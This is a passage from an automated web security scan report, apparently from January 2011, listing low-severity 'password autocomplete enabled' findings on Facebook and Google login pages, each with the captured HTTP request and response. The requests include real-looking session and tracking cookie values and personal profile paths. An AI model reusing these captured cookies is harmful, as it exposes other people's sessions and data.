<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.109. http://www.facebook.com/%s

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /%s

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /%s HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=NgpY2; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:49 GMT
Content-Length: 11704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.110. http://www.facebook.com/2008/fbml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=wYDCq; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Mon, 24 Jan 2011 16:05:02 GMT
Content-Length: 11725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.111. http://www.facebook.com/7NEWS

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /7NEWS

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /7NEWS HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=aYRu9; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:40 GMT
Content-Length: 174522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.112. http://www.facebook.com/LIMEprpromo

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /LIMEprpromo

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /LIMEprpromo HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Tpmq1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:00 GMT
Content-Length: 155797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.113. http://www.facebook.com/abid.bahloul

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /abid.bahloul

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /abid.bahloul HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=6G7wO; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fabid.bahloul; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:02 GMT
Content-Length: 15128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.114. http://www.facebook.com/apps/application.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /apps/application.php

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /apps/application.php?id=62945690879 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=-yM75; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:18 GMT
Content-Length: 154403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.115. http://www.facebook.com/beirutcityguide

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /beirutcityguide

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /beirutcityguide HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=oJmQq; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:15:02 GMT
Content-Length: 156507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.116. http://www.facebook.com/connect/connect.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /connect/connect.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:12 GMT
Content-Length: 11418

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.117. http://www.facebook.com/miofeghali

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /miofeghali

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /miofeghali HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=eDdkX; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmiofeghali; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:26 GMT
Content-Length: 15117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.118. http://www.facebook.com/paty.kfoury

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /paty.kfoury

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /paty.kfoury HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=qOxUt; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:20 GMT
Content-Length: 15074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.119. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=250x287; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 13:14:46 GMT
Content-Length: 11419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.120. http://www.facebook.com/profile.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /profile.php

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /profile.php?id=836605415 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=1Nf86; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:20 GMT
Content-Length: 15196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.121. http://www.facebook.com/sharer.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The page contains a form with the following action URL:
  • https://login.facebook.com/login.php?login_attempt=1&display=popup
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=2yleE; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:01:04 GMT
Content-Length: 10902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1&amp;display=popup" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

15.122. https://www.google.com/accounts/Login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/Login

Issue detail

The page contains a form with the following action URL:
  • https://www.google.com/accounts/ServiceLoginAuth
The form contains the following password field with autocomplete enabled:
  • Passwd

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=adTYhQttweA;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Mon, 24 Jan 2011 16:44:39 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
</style>
<form id="gaia_loginform"

action="https://www.google.com/accounts/ServiceLoginAuth" method="post"

onsubmit=
"return(gaia_onLoginSubmit());"
>

<div id="gaia_loginbox">
...[SNIP]...
<td>
<input type="password"
name="Passwd" id="Passwd"
size="18"




class="gaia le val"

/>

</td>
...[SNIP]...

15.123. https://www.google.com/accounts/ServiceLogin

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The page contains a form with the following action URL:
  • https://www.google.com/accounts/ServiceLoginAuth
The form contains the following password field with autocomplete enabled:
  • Passwd

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
